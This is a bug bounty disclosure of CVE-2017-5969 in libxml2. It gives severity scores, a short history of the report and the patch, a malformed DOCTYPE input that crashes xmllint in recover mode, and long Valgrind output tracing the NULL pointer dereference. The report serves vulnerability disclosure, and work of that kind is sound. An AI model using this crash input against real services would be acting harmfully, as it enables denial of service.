Internet Bug Bounty: CVE-2017-5969: libxml2 when used in recover mode, allows remote attackers to cause a denial of service (NULL pointer dereference)

Source: HackerOne report H1:262665 by geeknik (hackerone.com)
Published: 2017-08-23 18:59:34

CVSS3: 4.7 Medium
  Attack Vector: LOCAL
  Attack Complexity: HIGH
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: UNCHANGED
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: HIGH
  Vector: CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

CVSS2: 2.6 Low
  Access Vector: NETWORK
  Access Complexity: HIGH
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: PARTIAL
  Vector: AV:N/AC:H/Au:N/C:N/I:N/A:P

EPSS: 0.004 Low
  Percentile: 68.8%

I first reported this bug to the developers on 20 November 2015. A patch was finally committed on 7 June 2017 here. The caveat here is that this only happens in recover mode which the developers say no sane person should ever use in production and/or against untrusted inputs. A CVE was assigned in April 2017.

The original crash involved some memory corruption which led to a null pointer dereference and subsequent segfault after running ./xmllint --recover against XML similar to <!DOCTYPE[<!ELEMENT l((|s)>.

test00.xml:1: parser error : xmlParseDocTypeDecl : no DOCTYPE name !
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
         ^
test00.xml:1: parser error : Space required after 'ELEMENT'
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                        ^
test00.xml:1: parser error : Input is not proper UTF-8, indicate encoding !
Bytes: 0xDF 0x28 0xE2 0x2C
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                        ^
test00.xml:1: parser error : Space required after the element name
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                         ^
test00.xml:1: parser error : ContentDecl : Name or '(' expected
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                             ^
test00.xml:1: parser error : internal error: xmlParseInternalSubset: error detected in Markup declaration

<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                               ^
test00.xml:1: parser error : DOCTYPE improperly terminated
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                               ^
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x452A72: xmlNextChar (parserInternals.c:535)
==100630==    by 0x4CF45F: xmlParseInternalSubset (parser.c:8460)
==100630==    by 0x4E655D: xmlParseDocument (parser.c:10852)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x452E0C: xmlNextChar (parserInternals.c:538)
==100630==    by 0x4CF45F: xmlParseInternalSubset (parser.c:8460)
==100630==    by 0x4E655D: xmlParseDocument (parser.c:10852)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x452EE3: xmlNextChar (parserInternals.c:540)
==100630==    by 0x4CF45F: xmlParseInternalSubset (parser.c:8460)
==100630==    by 0x4E655D: xmlParseDocument (parser.c:10852)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4D39A7: xmlParseMisc (parser.c:10723)
==100630==    by 0x4E6197: xmlParseDocument (parser.c:10872)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4D39FA: xmlParseMisc (parser.c:10726)
==100630==    by 0x4E6197: xmlParseDocument (parser.c:10872)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4D3A3F: xmlParseMisc (parser.c:10726)
==100630==    by 0x4E6197: xmlParseDocument (parser.c:10872)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
test00.xml:1: parser error : internal error: Huge input lookup
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x445E2C: xmlParserPrintFileContextInternal (error.c:184)
==100630==    by 0x448B99: xmlReportError (error.c:404)
==100630==    by 0x44FB9C: __xmlRaiseError (error.c:631)
==100630==    by 0x474CA5: xmlFatalErr (parser.c:538)
==100630==    by 0x474CA5: xmlGROW (parser.c:2075)
==100630==    by 0x4E5CCF: xmlParseDocument (parser.c:10878)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x445E6C: xmlParserPrintFileContextInternal (error.c:184)
==100630==    by 0x448B99: xmlReportError (error.c:404)
==100630==    by 0x44FB9C: __xmlRaiseError (error.c:631)
==100630==    by 0x474CA5: xmlFatalErr (parser.c:538)
==100630==    by 0x474CA5: xmlGROW (parser.c:2075)
==100630==    by 0x4E5CCF: xmlParseDocument (parser.c:10878)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                               ^
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4749A8: xmlGROW (parser.c:2079)
==100630==    by 0x4E5CCF: xmlParseDocument (parser.c:10878)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x4E55FC: xmlParseDocument (parser.c:10879)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
test00.xml:1: parser error : Start tag expected, '<' not found
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x445E2C: xmlParserPrintFileContextInternal (error.c:184)
==100630==    by 0x448B99: xmlReportError (error.c:404)
==100630==    by 0x44FB9C: __xmlRaiseError (error.c:631)
==100630==    by 0x4E5012: xmlFatalErrMsg (parser.c:565)
==100630==    by 0x4E5012: xmlParseDocument (parser.c:10880)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
==100630== Conditional jump or move depends on uninitialised value(s)
==100630==    at 0x445E6C: xmlParserPrintFileContextInternal (error.c:184)
==100630==    by 0x448B99: xmlReportError (error.c:404)
==100630==    by 0x44FB9C: __xmlRaiseError (error.c:631)
==100630==    by 0x4E5012: xmlFatalErrMsg (parser.c:565)
==100630==    by 0x4E5012: xmlParseDocument (parser.c:10880)
==100630==    by 0x50657F: xmlDoRead (parser.c:15340)
==100630==    by 0x50657F: xmlReadFile (parser.c:15402)
==100630==    by 0x41CD6F: parseAndPrintFile (xmllint.c:2401)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630== 
<!DOCTYPE[<?l?><!ELEMENT�(�,()>
                               ^
==100630== Invalid read of size 4
==100630==    at 0x5BD149: xmlDumpElementContent (valid.c:1181)
==100630==    by 0x5CD871: xmlDumpElementDecl (valid.c:1706)
==100630==    by 0xA06A82: xmlBufDumpElementDecl (xmlsave.c:501)
==100630==    by 0xA06A82: xmlNodeDumpOutputInternal (xmlsave.c:939)
==100630==    by 0xA06A82: xmlNodeListDumpOutput (xmlsave.c:825)
==100630==    by 0xA06A82: xmlDtdDumpOutput (xmlsave.c:749)
==100630==    by 0xA032B2: xmlDocContentDumpOutput (xmlsave.c:1234)
==100630==    by 0xA032B2: xmlSaveDoc (xmlsave.c:1936)
==100630==    by 0x416BA6: parseAndPrintFile (xmllint.c:2705)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==100630== 
==100630== 
==100630== Process terminating with default action of signal 11 (SIGSEGV)
==100630==  Access not within mapped region at address 0x0
==100630==    at 0x5BD149: xmlDumpElementContent (valid.c:1181)
==100630==    by 0x5CD871: xmlDumpElementDecl (valid.c:1706)
==100630==    by 0xA06A82: xmlBufDumpElementDecl (xmlsave.c:501)
==100630==    by 0xA06A82: xmlNodeDumpOutputInternal (xmlsave.c:939)
==100630==    by 0xA06A82: xmlNodeListDumpOutput (xmlsave.c:825)
==100630==    by 0xA06A82: xmlDtdDumpOutput (xmlsave.c:749)
==100630==    by 0xA032B2: xmlDocContentDumpOutput (xmlsave.c:1234)
==100630==    by 0xA032B2: xmlSaveDoc (xmlsave.c:1936)
==100630==    by 0x416BA6: parseAndPrintFile (xmllint.c:2705)
==100630==    by 0x410409: main (xmllint.c:3759)
==100630==  If you believe this happened as a result of a stack
==100630==  overflow in your program's main thread (unlikely but
==100630==  possible), you can try to increase the size of the
==100630==  main thread stack using the --main-stacksize= flag.
==100630==  The main thread stack size used in this run was 8388608.
Segmentation fault
